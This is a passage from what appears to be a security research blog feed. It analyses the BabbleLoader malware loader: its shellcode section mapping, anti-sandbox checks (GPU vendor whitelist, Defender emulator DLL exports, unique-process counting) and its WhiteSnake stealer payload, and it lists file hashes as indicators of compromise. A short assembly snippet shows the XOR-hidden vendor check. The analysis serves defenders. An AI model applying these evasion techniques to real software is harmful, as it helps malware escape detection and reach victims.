&lt;td&gt;92263458&lt;/td&gt;
&lt;td&gt;NtUnmapViewOfSection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9DA1D253&lt;/td&gt;
&lt;td&gt;NtClose&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6AF3F390&lt;/td&gt;
&lt;td&gt;NTQuerySystemInformation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0A96AB0E4&lt;/td&gt;
&lt;td&gt;RtlAllocateHeap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8A21A480&lt;/td&gt;
&lt;td&gt;RtlFreeHeap&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Shellcode Loading and Payload Decryption&lt;span class="hx:absolute hx:-mt-20" id="shellcode-loading-and-payload-decryption"&gt;&lt;/span&gt;
&lt;a href="#shellcode-loading-and-payload-decryption" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Once the loader resolves pointers for the imports, it first calls
&lt;code&gt;NtCreateSection&lt;/code&gt;, followed by &lt;code&gt;NtMapViewOfSection&lt;/code&gt;. This approach allows the
malware to allocate and manage memory outside the standard process space. The
decryption process begins with the loader rearranging the randomly stored
encrypted chunks of the payload into their correct order within the mapped
memory, before proceeding to decrypt each block.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig11.png" title="Decryption stages" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decryption stages&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Before calling the decrypted code, the loader will perform one of a number of
anti sandboxing checks.&lt;/p&gt;
&lt;h3&gt;AntiSandboxing/Analysis&lt;span class="hx:absolute hx:-mt-20" id="antisandboxinganalysis"&gt;&lt;/span&gt;
&lt;a href="#antisandboxinganalysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;DirectX DLL&lt;span class="hx:absolute hx:-mt-20" id="directx-dll"&gt;&lt;/span&gt;
&lt;a href="#directx-dll" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;One of the anti-sandboxing checks involves checking the installed graphics
adapters to see if it is running in a sandboxed environment or not. This is
achieved by importing the DLL &lt;code&gt;dxgi.dll&lt;/code&gt;. The DLL is the DirectX Graphics
Infrastructure library and is a core Windows DLL that provides functionality
for interfacing with graphics hardware.&lt;/p&gt;
&lt;p&gt;The exported function &lt;code&gt;CreateDXGIFactory&lt;/code&gt; is called giving the loader a
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgi/nn-dxgi-idxgifactory"target="_blank" rel="noopener"&gt;IDXGIFactory&lt;/a&gt;
object. This allows the loader to enumerate information from the installed
graphics adapters by calling &lt;code&gt;EnumAdapters&lt;/code&gt;, followed by &lt;code&gt;GetDesc&lt;/code&gt; from the
&lt;code&gt;IDXGIAdapter&lt;/code&gt; object to give a &lt;code&gt;DXGI_ADAPTER_DESC&lt;/code&gt; struct.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-c" data-lang="c"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;typedef&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;DXGI_ADAPTER_DESC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;WCHAR&lt;/span&gt; &lt;span class="n"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt; &lt;span class="mi"&gt;128&lt;/span&gt; &lt;span class="p"&gt;];&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;UINT&lt;/span&gt; &lt;span class="n"&gt;VendorId&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;UINT&lt;/span&gt; &lt;span class="n"&gt;DeviceId&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;UINT&lt;/span&gt; &lt;span class="n"&gt;SubSysId&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;UINT&lt;/span&gt; &lt;span class="n"&gt;Revision&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;SIZE_T&lt;/span&gt; &lt;span class="n"&gt;DedicatedVideoMemory&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;SIZE_T&lt;/span&gt; &lt;span class="n"&gt;DedicatedSystemMemory&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;SIZE_T&lt;/span&gt; &lt;span class="n"&gt;SharedSystemMemory&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LUID&lt;/span&gt; &lt;span class="n"&gt;AdapterLuid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;DXGI_ADAPTER_DESC&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;From these structs is parsed the &lt;code&gt;VendorId&lt;/code&gt;, and it is compared against three
values that form a vendor whitelist.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ID&lt;/th&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;8086&lt;/td&gt;
&lt;td&gt;Intel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10DE&lt;/td&gt;
&lt;td&gt;Nvidia&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1002&lt;/td&gt;
&lt;td&gt;AMD&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;This anti-sandboxing technique has been observed in previous malwares, namely
&lt;a href="https://www.sentinelone.com/blog/sfg-furtims-parent/"target="_blank" rel="noopener"&gt;Furtim in 2016&lt;/a&gt; and
&lt;a href="https://blog.morphisec.com/in2al5d-p3in4er"target="_blank" rel="noopener"&gt;Invalid Printer Loader in 2023&lt;/a&gt;.
BabbleLoader takes additional measures to hide the vendor ID numbers through
using a simple XOR key and a few assembly instructions. The instructions are
separated by a large amount of junk code so as to hide the values when
statically analyzing the sample in a disassembler.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;mov [rsp&amp;#43;1FF48h&amp;#43;nvidiaId], 0E8185136h
...
//Junk
...
mmov eax, [rsp&amp;#43;1FF48h&amp;#43;nvidiaId]
xor eax, 0E81841E8h
mov [rsp&amp;#43;1FF48h&amp;#43;nvidiaId], eax
...
//Junk
...
mov eax, [rsp&amp;#43;1FF48h&amp;#43;nvidiaId]
cmp [rsp&amp;#43;1FF48h&amp;#43;vendorId], eax&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The decoded value (Nvidia Vendor ID) is shown below:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig12.png" title="XOR to derive VendorID" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;XOR to derive VendorID&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;VDLL Function&lt;span class="hx:absolute hx:-mt-20" id="vdll-function"&gt;&lt;/span&gt;
&lt;a href="#vdll-function" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Another form of anti-sandboxing comes in the form of a VDLL check to combat
Windows Defender’s Antivirus Emulator. To start this check, BabbleLoader, in a
similar manner to how it deobfuscates strings to dynamically resolve functions,
will decode two DLLs with exports.&lt;/p&gt;
&lt;p&gt;The first check is to get &lt;code&gt;kernel32.dll&lt;/code&gt; and look for the proc address for
&lt;code&gt;MpSwitchToNextThread_WithCheck&lt;/code&gt;. The second check is &lt;code&gt;ntdll.dll&lt;/code&gt; with the
export of &lt;code&gt;MpDispatchException&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig13.png" title="Call of emulated function" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Call of emulated function&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If any of the &lt;code&gt;GetProcAddress&lt;/code&gt; calls are successful, it will set a variable for
the loader to exit later. A successful import of any of these calls will
indicate that the loader is being emulated by Windows Defender. This is because
these exports only exist in VDLLs, which are modified Windows system DLLs
available only in the emulator for Defender. This technique has been used by
&lt;a href="https://web.archive.org/web/20240727145128/https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/"target="_blank" rel="noopener"&gt;Raspberry Robin previously&lt;/a&gt;,
and suggests that the loader developer is able to incorporate new technical
research around antivirus and sandboxing internals.&lt;/p&gt;
&lt;h4&gt;Unique process count&lt;span class="hx:absolute hx:-mt-20" id="unique-process-count"&gt;&lt;/span&gt;
&lt;a href="#unique-process-count" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;When the shellcode payload that is stored in the mapped memory of the newly
created section is executed, it performs another anti sandboxing check, this
time based on the running processes in the machine.&lt;/p&gt;
&lt;p&gt;This is achieved first by calling &lt;code&gt;NtQuerySystemInformation&lt;/code&gt;, previously
dynamically resolved from &lt;code&gt;ntdll.dll&lt;/code&gt;. Getting the &lt;code&gt;SystemProcessInformation&lt;/code&gt;
class. This returns an array of &lt;code&gt;SYSTEM_PROCESS_INFORMATION&lt;/code&gt; structures, one
for each process running in the system.&lt;/p&gt;
&lt;p&gt;The process name for each process in the array is gathered and hashed as a
checksum, and compared with the hash of the name of the process next in the
array. A counter is incremented with each iteration, but if the checksums
match, the counter is reduced by one. Giving the number of processes with
unique names running.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig14.png" title="Checksum counter" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Checksum counter&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The counter is compared to check if there are at least 85 unique processes
running on the machine. With the assumption that a true infected computer would
have more running processes rather than a sandbox or emulator that is trying to
be as lightweight as possible to reduce noise and costs. This technique has
been employed by other malware also, such as
&lt;a href="https://blog.reveng.ai/latrodectus-distribution-via-brc4/"target="_blank" rel="noopener"&gt;Latrodectus&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;When the check has passed, the next stage of the payload will be decoded and
executed.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig15.png" title="Second stage of decryption" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Second stage of decryption&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Donut Loader and Payload&lt;span class="hx:absolute hx:-mt-20" id="donut-loader-and-payload"&gt;&lt;/span&gt;
&lt;a href="#donut-loader-and-payload" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The next stage in this chain is a
&lt;a href="https://github.com/TheWover/donut"target="_blank" rel="noopener"&gt;Donut loader&lt;/a&gt;. This is used to unpack and
execute the final payload in memory. Donut loaders have been used by many
different malware and threat groups in their operations. The payload in this
sample is a
&lt;a href="https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-whitesnake-2acd8af9d61b"target="_blank" rel="noopener"&gt;WhiteSnake stealer&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig16.png" title="WhiteSnake Payload" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;WhiteSnake Payload&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This payload has a very interesting method of communication with its Command
and Control (C2) server over TOR. The C2 communication is described in further
detail in a blog from
&lt;a href="https://jfrog.com/blog/new-malware-targets-python-developers-uses-tor-for-c2-communication/"target="_blank" rel="noopener"&gt;JFrog in 2023&lt;/a&gt;,
but instead of downloading from the official TOR Project website. The payload
is downloaded from &lt;a href="https://github.com/matinrco/tor"target="_blank" rel="noopener"&gt;this github repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig17.png" title="Open source project downloaded by WhiteSnake" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Open source project downloaded by WhiteSnake&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;In other samples, Meduza stealer has also been observed. There may be other
stealer payloads delivered that have not been observed yet.&lt;/p&gt;
&lt;h2&gt;Considerations for Defense&lt;span class="hx:absolute hx:-mt-20" id="considerations-for-defense"&gt;&lt;/span&gt;
&lt;a href="#considerations-for-defense" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The use of loaders is a long-standing technique incorporated by threat actors.
In order for modern day threat actors to have any success against the many
layers of detection employed by security vendors, they too must incorporate
multiple layers of defense within their own builds. It is a never ending arms
race between attacker and defender. Each side imposing increasing costs on the
other in a frantic effort to come out on top, no matter how short that time
period may be.&lt;/p&gt;
&lt;p&gt;The better that the loaders can protect the ultimate payloads, the less
resources threat actors will need to expend in order to rotate burned
infrastructure. BabbleLoader takes measures to protect against as many forms of
detection that it can, in order to compete in a crowded loader/crypter market.
The types of protection utilized protect the loader against hash, rule,
genetic, static, dynamic, and AI forms of detection, imposing costs upon
security vendors in the hope that the cost of detection will be so high that it
will cause security vendors to overlook analyzing these files.&lt;/p&gt;
&lt;p&gt;The developer behind this loader demonstrates an active engagement with current
security research, rapidly integrating new techniques to enhance evasion
capabilities. For instance, recent anti-sandboxing features reflect insights
from research on Windows Defender presented by white-hat experts at Black Hat,
allowing the loader to better evade detection by Microsoft’s defenses. This
adaptability shows a strategic commitment to keeping the loader ahead of
evolving security tools by adopting the latest innovations in bypass
techniques, making it more resilient and harder to detect with each new build.&lt;/p&gt;
&lt;p&gt;Many security vendors will look at using AI to help in future cases with
combating these loaders. The loaders of the future are already well equipped in
this fight. The loader’s layered obfuscation tactics pose a formidable
challenge for AI-based defenses. These techniques flood the AI with irrelevant
tokens and misleading patterns, making it difficult to distinguish meaningful
actions from noise. Each layer of complexity forces the AI to process massive
amounts of data, drastically increasing computational and financial costs. By
weaponizing this volume and variability, the loader effectively undermines AI’s
pattern recognition and analysis capabilities, pushing the limits of automated
detection systems.&lt;/p&gt;
&lt;p&gt;There is no signs of slowing down in the pace in the thriving loader market.&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;BabbleLoader&lt;span class="hx:absolute hx:-mt-20" id="babbleloader"&gt;&lt;/span&gt;
&lt;a href="#babbleloader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;052c776fdc9700dfb37f964a73d461a57efad30a01bcf54505d7abcd601e6ff3
0ad8513b62a778d7e426627be3ed2dbaf00d99b9802a1f566dc9203e3d311fc3
0f6847d33cb38b0ed6dc1d8cfe3dc5d2e293d91c4880e3b4f5ddb77fd9d4cd1f
114b868f319162c5d6ff92796e41910f54de0e89f895a066fd4980c6dba2e323
1367fb270f35512b17fe5e73cc0233ace272daafe15cf94e45f696431f52332f
1537965c7722a9886d542688fcbafecd1248b2fbd56e9a90a803a50e880e1bb8
16200bbe4646fe8cefeee5be20ce55c50300485f3356ab181fb930bd02536709
1da4de2b4b87bff7f9f1a3208c5c663a06f7f9b67f918e5a5e8e860e759b7075
200289d5a408a2e49a894228edb3324548ca5c5c0283d09486aa287df41f15bc
217d7501287ae894f47bd04253bd184d1901dd131b0cd15bcbbeba5158049d5d
22866e6ded40916de8002606f82e44ee141f27c3340fa2c4d16514624ee05a72
237812322bbbcf47feeb79b8e91b97d00453ffd5deb52c819c183b45d18b0b5a
25923b822e9a1374817caf79375170b944f2762b1e3f2add921008ffec702740
2a8a340fc9c395fe23211ac95d124b64452d49c67b069f53aaf3dbe16e95791d
2b6bff7b8c23f1fa526e116c7577c32845d5b969c68a66850c305a351adc9726
2d6b50003436ed489d1b46566eb879e317e1b9a5b6edb12f3cbb4c8a8d932a08
2eab850166944175e5fac4c89706328a58dcef55dbc22ff20342d1d246ba76b9
2ee32c46207119f6851f2869203124c104c72cfdf9622416252ae3405f485cd2
328d92b71034d74c016b1f8e70217be3f432a2ade8fe44522f84980fd0dbb1f9
33e42e7828cda7987d17342e0eb8134f590cd3d291dbc75f13334259a4908ba1
3bf5f07059a24fb803c6fefb874f000e9c300372b1b870e48b4935bd0219fe2b
401209ec9dda222984fd5cb775a6b6c2e651d88c04a506c9058cb1decdce869d
451e1bec8476a89c7d2b526071fa2918187f2f5b3ba9362e6999114993a74da5
455cd0db2de92ee348295780f8fc7a32a5406a5986a4d162761680f11b6346b1
466a8af8d0b51ed82aec35b17b845e6baf77ada259aa2fd5591024a01d8e31b5
46b355d25b95d7f9d7029f1ee1a346028e3c5bdec9e6c9245c12d1607cb1c686
46f0e190cd346d1eb6d0c27386bb3aceebf4ad44b25d253cac4063e2ccde9028
478eb22a1f1be2ef6e70625cf42ca61c716389135acbb705c0e21f0cf330bf46
47a71eb078b14a92eb5fb990f606aa48e535860af90ebc5e075c8b2e4d829633
4b7fa864007357e3e799eeb4a9630425652178551a9c37181fc6ea86660af814
4ba95478ea0ac78e038d30693fabf95244bd70e40b36b2a928f3854551d6fa78
4bed4960a896ebeafa9a9421d7ecf389205a2f0216ad911bdcd80f28237159e6
4e40aaddf718b70f397d449f8ca9a577ef0106f281ccb50f0b5cde531b758881
5305556bee271232973a9e09c4776a3b386964112785db638b225b2cc61d9af7
53e451750c099f33f80a3652d9f2a804390de0f867af13ae22ad0fbf4b15f8c3
5493fa6f2ab69da66352532b2c13e7e461bcde6cc2810a6f6af88e139dde1ae7
5665c96975c959b5e8057b7aed46f7c203335aefa35f5e290c538e9300e3e293
5b9481d9022b0efcaed04513d338048de4aa3e1328bacc0966486ef322c0d086
5eb3bb67656d990ceec07f55c78dcd8032a7cf00ac919a399e3642b177f68381
60ecef2d0a966db913bff15872c072175b895e16271351c43e5a0cf9e4018f22
643dde3f461907a94f145b3cd8fe37dbad63aec85a4e5ed759fe843b9214a8d2
69ad389722dd8b49590b2aa014f703b39737894073c7339ea44c94d296e00273
78f6c822cee2b0587df145d67478cce5bbeb76147a7846d08b7b6fd09aa36ce2
796c245c5bb1e7c1dcd52c4e8f83e1c707e391f6409ee9b5e1dd18658ff0e05f
7df313618a02e8e9961ddb1c3289956eb18361f1ca9fb639d64a00fae7568a4b
7e5ba9e3ccc1cb52d24c21c6d378a32bb540a8519789d8cf796e5dd351fc6958
8907a8454ef56d64bf788b9c8c64bbaaf187be7a9666d8d8331fd187c49c6031
8a28e457b19060678d5d007b291722e1dea92f69249e1588ca5b97eb1fe10807
8cc2e1104480875ee237bf4ca9f3d83e46ca213f5c88df95be0d78e05c7c2d71
8cf8bea6842219e565720919372e4aa530942b28d533231043ee57e7bb424cbe
8d8c3b6be212ce645566311ce95ad9ad3aad37795042882adefda9716deb2eab
8e63b1f7f8e29b9a714f796e2e8ca0cd1094086e2d0a5de21601e23e1792a906
9125c13250a14905a4fd97978a3a6dbba80df01e73d98f8d4fa2d19b49d9fda0
9314ea889f93da5cd39129840a42bd5f228538686a2345f56e757e5a5d956dee
9bf7a01254fed809e0f564f28a3cf54156ea98f85d3b633ae3a213a87f9db143
9dfb8ed499b667d782ae3a4ce40472893a789ed973f48884b47358536b6a76e8
9fa7574f35fae3d309c8cefe0e8a43d07afb6cefaee0caa3b2538263bd4a7ec5
a01ac4244102e3958296c70d71e3d951f11abcc355458d1918d081587b151d90
a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87
a29e108e912c77ed565873bd205da01ed0e6001d18b442139c06827428d2eba1
a3b45619606d4c3c487047786e3d51a98fdcc1fdc43dc7b6f6e80974fd0a9c97
a695cb493631962a4c2fd61a094cb0b952ce708a99af714772cddd4991f32df0
ae6ee6bf2f9890ed83922e5c80770dd88faa9b32b2211462ea2eed29bf1bf6c5
b14af38c4230de20c7c4fefc1e3c5fffb1562bacedfebc56a508f55182a6fe88
b1ebe1794e091fd82a34d6806f18f64ebadb5d3b2343a661c481fb7c54cb872f
b2a91277e5fb40a0a38215142f683554b4e7c03ccd439e0d056c56b031a5bec5
b72d9ae8484b91ec9c6167e6707617f495622f3b684f6b3e30b29106891c778b
bb4f812f8bb4e7b33d7b583407370a5351d079f63b26956adc7ab317b3d90601
bdd6bd29937059dd944fb09163a24e4482c5ce420d3de749e5e46c6c25b2ea86
c2a95f22cfee1f4df67a424e30425b59c23db265bff611f2ee653d71b30a70d8
ca67f61b5f8d20ec3f45dbbfc355045a8ceee15396f1cad032850a3ee23a42b3
cd3f064d088a3a6a6ad03da148701fb6b660866b8aac2a808359505620166641
d7967661947ca835deddec30ae6e62d580718cbdeafb42cd6d0f038a407edcf0
d9cea34db0d1dc016dd4007d8cd11416f095c41b0639f13af1eb6ad675651df2
db282cae419ed5af3338f65f170ecd7b312cac2500b5cb2c8824721ba981c361
db41e032193becc097d0da85cac74cf1f519b85cf731f783ccea11c1e20ad23f
e09c36993e1c29b6ef0f1c73e02aee54686c0df49b6d87b577e70f261313acaf
e13f20752f6298728ac0463a3f4b0657d5657ca7710e63a27ac1179078ac71f6
e1448680114cb3dd06aa81a3b1037f77e6d5b3f6dce213aa38cffdec72d59e74
f2f23a963952c1a822484382bf4c68cd8b7278400ad2d8bacf3235ba2fc42a89
fa292bfcf81223bab0f79d4ce08187e37d68960005629df0241ea22f0b95d7a8
fc589aa3529a057fee52a1c9bd9bb19fa42bbfd291b7dbb3791e77eced376640
ffcae0093d509563b47b1d0cef3aa455a4358de3a1d2c2b84c298a927aa238e8&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;WhiteSnake Stealer&lt;span class="hx:absolute hx:-mt-20" id="whitesnake-stealer"&gt;&lt;/span&gt;
&lt;a href="#whitesnake-stealer" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;6dce9024ec032390ca4294f62cb282a09291cf141cb003f7e0ef23bb7a34bfae&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>Technical Analysis of a Novel IMEEX Framework</title><link>https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/</link><pubDate>Thu, 10 Oct 2024 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/</guid><description>
&lt;p&gt;The IMEEX framework is a newly discovered, custom-built malware designed to
target Windows systems. Delivered as a 64-bit DLL, it offers attackers
extensive control over compromised machines. This framework is notable for its
robust capabilities, featuring a wide array of functionalities, including
execution of additional modules, file manipulation, process management,
registry modification, and remote command execution. It also performs system
reconnaissance by gathering critical system information, such as hostname,
